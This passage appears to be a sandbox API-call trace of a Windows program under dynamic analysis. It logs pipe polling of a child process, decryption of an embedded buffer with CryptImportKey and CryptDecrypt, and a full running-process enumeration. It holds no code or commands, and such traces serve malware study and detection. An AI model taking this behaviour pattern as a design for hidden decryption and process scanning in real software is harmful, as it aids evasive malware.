lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0133.389] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.419] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0133.419] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.649] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0133.649] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.668] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0133.668] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.699] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0133.700] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.731] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0133.731] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.762] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x1c, lpBytesLeftThisMessage=0x0) returned 1 [0133.762] ReadFile (in: hFile=0x128, lpBuffer=0x71fb18, nNumberOfBytesToRead=0x1c, lpNumberOfBytesRead=0x71f89c, lpOverlapped=0x0 | out: lpBuffer=0x71fb18*, lpNumberOfBytesRead=0x71f89c*=0x1c, lpOverlapped=0x0) returned 1 [0133.762] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0133.793] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0133.793] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x0 [0133.823] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x2d, lpBytesLeftThisMessage=0x0) returned 1 [0133.823] ReadFile (in: hFile=0x128, lpBuffer=0x71fb18, nNumberOfBytesToRead=0x2d, lpNumberOfBytesRead=0x71f89c, lpOverlapped=0x0 | out: lpBuffer=0x71fb18*, lpNumberOfBytesRead=0x71f89c*=0x2d, lpOverlapped=0x0) returned 1 [0133.823] GetExitCodeProcess (in: hProcess=0x134, lpExitCode=0x71f88c | out: lpExitCode=0x71f88c*=0x0) returned 1 [0133.823] CloseHandle (hObject=0x130) returned 1 [0133.823] CloseHandle (hObject=0x134) returned 1 [0133.823] CloseHandle (hObject=0x120) returned 1 [0133.823] CloseHandle (hObject=0x124) returned 1 [0133.823] CloseHandle (hObject=0x128) returned 1 [0133.824] CloseHandle (hObject=0x12c) returned 1 [0133.824] GetProcessHeap () returned 0x520000 [0133.824] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c350 | out: hHeap=0x520000) returned 1 [0133.824] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0133.824] GetProcessHeap () returned 0x520000 [0133.824] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0133.824] GetProcessHeap () returned 0x520000 [0133.824] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x400) returned 0x546028 [0133.824] CryptImportKey (in: hProv=0x534c10, pbData=0x71fc90, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x534bdc | out: phKey=0x534bdc*=0x53a5f8) returned 1 [0133.824] CryptDecrypt (in: hKey=0x53a5f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x546028, pdwDataLen=0x71fd00 | out: pbData=0x546028, pdwDataLen=0x71fd00) returned 1 [0133.825] CryptDestroyKey (hKey=0x53a5f8) returned 1 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5443c8 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c350 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5443d8 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c3c8 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5443e8 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1e) returned 0x53c3a0 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5443f8 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c378 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544408 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1c) returned 0x53c3f0 [0133.825] GetProcessHeap () returned 0x520000 [0133.825] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544418 [0133.825] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x16) returned 0x539e00 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544428 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x539e20 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544438 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x16) returned 0x539e40 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544448 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c418 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544458 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c440 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544468 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x22) returned 0x5435c8 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544478 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c468 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544488 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1c) returned 0x53c490 [0133.826] GetProcessHeap () returned 0x520000 [0133.826] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544498 [0133.826] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x2a) returned 0x53a5f8 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5444a8 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1e) returned 0x53c4b8 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5444b8 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x16) returned 0x539e60 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5444c8 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x24) returned 0x5435f8 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5444d8 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x53c4e0 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5444e8 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x539e80 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5444f8 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x16) returned 0x539ea0 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544508 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1c) returned 0x53c508 [0133.827] GetProcessHeap () returned 0x520000 [0133.827] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544518 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1e) returned 0x53c530 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544528 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x539ec0 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544538 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x26) returned 0x543628 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544548 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x539ee0 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544558 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c558 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544568 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c580 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544578 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x539f00 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544588 [0133.828] GetProcessHeap () returned 0x520000 [0133.828] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x539f20 [0133.828] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544598 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x544b60 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5445a8 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c5a8 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5445b8 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x544b80 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5445c8 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x16) returned 0x544ba0 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5445d8 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1a) returned 0x53c5d0 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5445e8 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x20) returned 0x546448 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x5445f8 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x14) returned 0x544bc0 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544608 [0133.829] GetProcessHeap () returned 0x520000 [0133.829] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x544be0 [0133.830] GetProcessHeap () returned 0x520000 [0133.830] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x8) returned 0x544618 [0133.830] GetProcessHeap () returned 0x520000 [0133.830] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x18) returned 0x544c00 [0133.830] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0133.836] Process32FirstW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.836] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0133.837] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0133.837] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.838] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0133.839] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0133.839] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0133.840] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0133.841] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0133.841] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0133.842] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.842] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.843] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.844] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.844] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.845] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0133.845] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.846] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.847] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0133.847] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0133.848] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0133.848] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.849] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.850] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0133.850] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rentals toe velocity.exe")) returned 1 [0133.851] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x70c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="charm devel lyrics.exe")) returned 1 [0133.851] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="acquisition.exe")) returned 1 [0133.852] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="shape.exe")) returned 1 [0133.853] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pipepantyhose.exe")) returned 1 [0133.853] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mm-belong.exe")) returned 1 [0133.854] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rather desert.exe")) returned 1 [0133.854] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="argument.exe")) returned 1 [0133.855] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="membership-installing-badge.exe")) returned 1 [0133.864] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mba.exe")) returned 1 [0133.865] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="calendars-vegetarian-build.exe")) returned 1 